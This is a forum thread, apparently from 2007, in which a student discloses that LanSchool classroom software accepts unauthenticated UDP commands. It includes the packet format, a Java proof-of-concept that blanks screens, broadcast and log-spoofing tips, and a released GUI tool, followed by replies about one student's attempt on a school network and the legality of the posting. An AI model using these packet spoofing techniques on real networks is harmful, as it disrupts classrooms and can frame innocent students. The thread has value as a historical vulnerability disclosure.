LanSchool Hack

[Dan]

UPDATE: LanSchool has fixed the potential security flaw in v7.0 of there software on May 2007, so the bellow no longer effects LanSchool.

NOTE: The bellow is only the option of it's poster, Dan. Like all posts on CompSci.ca, it is only option and only the option of the poster.

NOTE: "LanSchooled" is not the same as LanSchool, nor does it provied the same functions of or even work now that the potential security flaw has been fixed in LanSchool.

For more up to date infromation see the wiki: http://wiki.compsci.ca/index.php?title=LanSchool and http://lanschool.com



Normaly i whould not think of posting such work on this site but this is part of my campain to get school borads to realise that they shoud not be using LanSchool and that there are masive security falws in it.

The Story
During grade 12 i chaged schools, the new school i whent to had alot better networks and computer labs witch was a good thing, or so i thought. After playing around for a bit i noticed a litte green icon in the tast bar that did not seem to do anyting. Looking feathure in to this i found out it was a progame named LanSchool (http://www.lanschool.com/). Now what is LanSchool you mayask, the names makes it sound insent enought, maybe somthing to help students? Well it may have started out that way but what it has become is basiclky a toringhorse progame for teachers to use to watch everything you are doing (incduing watching your screen) as well as giving them the ablity to control your computer or all computers in the lab at the same time. As ushealy the school borad decsied to spend money on somthing they could get for free and got a crapyer verson then what they could get for free.

So i started looking in to LanSchool more and found a demo verson on there site. This demo verson could not interact with real versons the school used and whould not allow studens to do any damge. 1st i looked in to how it was effecting the regiersy of the computers it was on, and found that every time the teacher application sent a comand to the student versons it recored what windows user sent the comand, the windows name of the computer they where on and the time in all regersitrys of every comp on the network. This ment that finding a full verson of the software althougth not hard whould end you up in alot of trouble unless you brought your own computer to school and even then still could.

So i begain to look at the packets it was send and to my shock they where UDP and not TCP and they had no ecription or coding at all to them. This means that it is exteramly easy to spoof the packets. So i quiclky wrote up a simple java progame to test out my theroy. Affter some time and exmermentation i decoded what most of the packets ment and was able to control the demo verson of LanSchool. Affter looking more at the packets i noticed that the difrces between the demo verson and the real verson is that the demo verso uses only one chanale witchis never used by the real verson. So it was simple a madder of chaing the chanel byte to a real chanle in the packet to get it to work with most if not all versons of LanSchool. Also this allowed me to make the regeisty logs say what ever i whonted, incuding blaming other stutdents for the hack.

Now being the nice guy that i am i e-maied my findings to LanSchool and sugested several ways to fix this expolite. There repsoses was basiclky saying that they whould rather send time and effort enforcing the rules of the school and the law then fixing there progame. And made threats that legal aucation as well as sudesnions could take place if i where to use this progame. So next i whent to my school and aucatly demstorated (with there permision) the expoite and how unscure it was. Again nothing happend with my efforts so amoth latter i published how the packet worked on compsci.ca.

It is now almost 2 years latter and i have rewriten my hack so any one even script kiddys can use it. With a nice gui and everything. My hope by doing this is to teach peoleop why progaming like LanSchool did is bad security wise and to encorge the school borad to buy (if they most) better software from comapnys that know what they are doing and are willing to chage with the times. BTW LanSchools website still claims that there are no know bugs with LanSchool.


The Packet
This is what the packet looks like:

Mode | Version | Channel [to blocks] |00 or DF |DA | D1| ___data here__|__log info__|

Mode is basickly the comand you are send so far i have found alot of them and here are some expamles:

00 - start boradcast of screens
04 - restore computer screens
07 - blaken all screens
08 - unload lanschool or just frezz it up good

The verson corposneds to what verson of lanschool you are runing versons 5.x seem to like 01 and 02 seems to be for 6.x

The channel area is prity simple, it is the channel number. The demo verson uses channel FF in hex or 255 in dec.

The next 3 bytes are kind of hard to figgure out but seem to allways be the same in the give verson of lanschool. For 5.x and the low 6.xs the 1st byte here should be 00 for 6.5 and some others it should be DF in hex. The other 2 seem to allways be the same.

The data area is data for that comand, some comands do not need this like blacken all screens.

The log area is where it puts the name of your computer and then your username for loging. This area also has alot of useless 00 bytes that just take up space.


Application of the above
The falowing is a very simple java application that will take adavagte of the above infomration to black out screens for the demo verson of 6.5 of lanschool only on the computer you are using. To send to all computers in a network you could use the ip 255.255.255.255

code:

public class LanHack {    public static void main(String args[])    {       try       {          InetAddress ipaddr=InetAddress.getByName("120.0.0.1");          DatagramSocket mysocket=new DatagramSocket();          byte sendbuf2[] = {(byte)0x07,(byte)0x02,(byte)0xff,(byte)0x3f,(byte)0xda, (byte)0xd1};          DatagramPacket sendPacket2 = new DatagramPacket( sendbuf2, sendbuf2.length, ipaddr, 796);             mysocket.send(sendPacket2);       }catch(Exception e){}    } }

Note that for lesser verson of lanschool you whould have to chage the 0x3f to 0x00 and posibley 0x02 to 0x01 or another number. Aslo this is set to the demo chan 0xff and if u whonted to send to a real verson you whould have to set it to 0xChanNumberInHex.


LanSchooled
Now for what i did with all this knogagel to make a point and click lanschool hack that can help you understand how the packets work. Rember that this is only for educational use and should not be used for evil purposes and i take no respoblity for what you do with it. With that side, i only tested it on the demo verson but i whould like to hear from peoleop if they got it to work on other versons.

How to use
The top frame shows the packet that will be sent, you can use the easy set up buttions below it to set the packet to do what you whont. The times bar will let you say how many times you whont to send out the packet.

Seting the channel to "ALL" will send to all posiable lanschool channels incuding the demo one. Seting the verson to "9" will send a verson 2 but with 0x00 rather then 0xdf. Seting to "2" will send verson 2 but with 0xdf. All other verson numbers send there verson and 0x00.

The log info lets you set what to set the name and comp name of in the regersity logs of the computers effected. I whould storgy remocmend peoleop not expoit this to get peoleop in thoruble since that is just evil.

You most hit send to aucatly send the packet. The easy set up buttions just configer the packet you are going to send.

Where to get
An windows excubalte, excubalte jar and the java sorce code have all been incudned in this post and should appaer below. In all cases you need java or a JVM instaled.


Edit: Also see http://www.compsci.ca/wiki/index.php?title=LanSchool

[Neo]

My old highschool used some kind of program like this. DOnt know whether it was Lanschool. I never really found any use for their computers except using a teachers account to print as much as I wanted.
To bad I cant go back and try this out...

So thats why they call you HACKER Dan.

[[Gandalf]]

I'm fairly sure my school/schoolboard have the same thing, but they don't use lanschool. Teachers often 'take control' of your computer, and even more often view what you are doing.

[Dan]

[Gandalf] wrote:

I'm fairly sure my school/schoolboard have the same thing, but they don't use lanschool. Teachers often 'take control' of your computer, and even more often view what you are doing.

I find that very few teachers even know about how it never mind how to use it. Uhsely it is only the network admin that dose. Still i whould sugested reporting this to your school and or school borad to help the cause in geting ride/fixing it.

[[Gandalf]]

Such is not the case in my school. Most teachers I have seen know how to use it, and the software used isn't lanschool either so the same exploit probably wouldn't work.

[chrispminis]

Such harsh replies from LanSchool, would it be too much of a hassle to post your letter to them, and their reply? I wanna read it word for word.

[Dan]

chrispminis wrote:

Such harsh replies from LanSchool, would it be too much of a hassle to post your letter to them, and their reply? I wanna read it word for word.

I whould love to but this was over 2 years ago when i made the 1st verson and talked to lanschool. I dougth i still have a copy since i moved like 3 times inbetween then and now but if i find a copy i will send you one. If some one can confourm that this hack works on a full verson (threw legal means) i will talk to them again and make post what they say.

[jamonathin]

My school has the LanSchool thing, is has the green ring incon. The .jar exec opened up, the exe didn't for some reason, meh. But I tried to use the black screen only to all computers but it didn't work for some reason, juss nothin happened. Unfortionately i was only able to test it once quick because i literally got it before the bell. Im not too shure why it doesn't do n e thing because i don't know of our version . .

[rizzix]

Dan it is illegal to post such exploits.. I think... you have to first let the company "fix" them only then can you publish them... On the other hand you could always widespread the exploits through some annonymous network... This would force the company to "fix" them.. and there's no way to blame it on you.

[Dan]

rizzix wrote:

Dan it is illegal to post such exploits.. I think... you have to first let the company "fix" them only then can you publish them... On the other hand you could always widespread the exploits through some annonymous network... This would force the company to "fix" them.. and there's no way to blame it on you.

I do not blive that is ture in canada and rember this for education reasons


jamonathin: when u hover over the green icon it will tell you what channel it is running on you need this to set the right channel or just set send to all. As for the verson try 0, 1, 2 and 9.

[1of42]

Actually Dan, rizzix I believe is correct, but it's not really illegal so much as the company could sue you and probably win over it.

[Dan]

1of42 wrote:

Actually Dan, rizzix I believe is correct, but it's not really illegal so much as the company could sue you and probably win over it.

Aucatly form the law i have read incuding on the RMP web site it says that you have to have unahuthized access to a computer system to be viloting the law. If i where to use this expoit on some one eltes computer system/network i whould be breaking the law. But just making the expoit for educational reasons is not aggsited the law in canada but it is agaited the law in the u.s.a.

How ever there is a big difrence between breaking the law and geting sued. You can do somthing legal and get sued. Tho i find this to be rather unlikey in this case.

Also it should be noted that in canadain hacking cases all hackers who got caugth and where not aucatly derstoying anything or stealing money where senteced to a maxume of 12 moth probation and 2 months of comunity serivce.

Tho it should also be noted that the u.s. has impresed hackers with out trials under nataional security reasons and could basikly never let them out or contacnt any one ever again and never see a layer.

Edit: In addtion to the above it whould be exteramly bad for lanschool to pursue legal or clive law sutis agsited me since the P.R. whould be horriable. This comapny almost sloely relies on schools for it's income. Title like "LanSchool sues stutden who trys to help" and "LanSchool expoited by studens and dose nothing" are not going to big selling points for them.

[rizzix]

Hacker Dan wrote:

Also it should be noted that in canadain hacking cases all hackers who got caugth and where not aucatly derstoying anything or stealing money where senteced to a maxume of 12 moth probation and 2 months of comunity serivce.

US is screwed up, but Canada does give you a criminal record. I'm clean so far hehe, i'd rather stay that way.

[Dan]

rizzix wrote:

Hacker Dan wrote:

Also it should be noted that in canadain hacking cases all hackers who got caugth and where not aucatly derstoying anything or stealing money where senteced to a maxume of 12 moth probation and 2 months of comunity serivce.

US is screwed up, but Canada does give you a criminal record. I'm clean so far hehe, i'd rather stay that way.

Very ture but i am 99.5% shure that writing software alone will not get u one. You have to use it to gain unautherised access. And that is only in some provinces others simpley do not have any law about it. The way candian hacking law works for the most part is that u have to break another nonhacking spefick law. For example if u hack in to a bank and steal moeny you get charged with stealing money. If you destory files u get chaged with tings ranging form vandlismes to mistuchife. Just hacking in to a system could get u the comunity sevirece metioned above but wrting an expoit to do it and not using it will not. It falls under free speah and such.

If you wiret up plans to steal money and get away with it and post them online u will not go to jail, how ever if u go threw with thos plans u do go to jail. I blive it to be the same with software explites and if i do get craged with somthing it whould be one hell of a law cases since i could applie to free speeah and bring it up prity high. By the time it was out of the courts i whould be retring and lanschool whould be long since dead.

[md]

It's an old one but you can be charged with theft of computer time. Of course these days computer time is rather cheap...

In reality hacking is not illegal in Canada; nor is posting exploits of comercial software. You don't need to give them any notice first either; even in the states. There are big cries in the media about it from companies like Microsoft, but IIRC no one has ever been successfully sued.